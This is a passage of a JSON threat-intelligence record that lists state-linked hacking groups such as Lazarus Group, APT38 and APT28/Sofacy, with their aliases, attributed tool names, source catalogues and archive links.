"2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null }, { "id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd", "created_at": "2022-10-25T16:07:23.766784Z", "updated_at": "2026-04-10T02:00:04.7432Z", "deleted_at": null, "main_name": "Bluenoroff", "aliases": [ "APT 38", "ATK 117", "Alluring Pisces", "Black Alicanto", "Bluenoroff", "CTG-6459", "Copernicium", "G0082", "Nickel Gladstone", "Sapphire Sleet", "Selective Pisces", "Stardust Chollima", "T-APT-15", "TA444", "TAG-71", "TEMP.Hermit" ], "source_name": "ETDA:Bluenoroff", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434598, "ts_updated_at": 1775826770, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4023c65b386018e28197a57a61b698196ec5aa17.pdf", "text": "https://archive.orkl.eu/4023c65b386018e28197a57a61b698196ec5aa17.txt", "img": "https://archive.orkl.eu/4023c65b386018e28197a57a61b698196ec5aa17.jpg" } }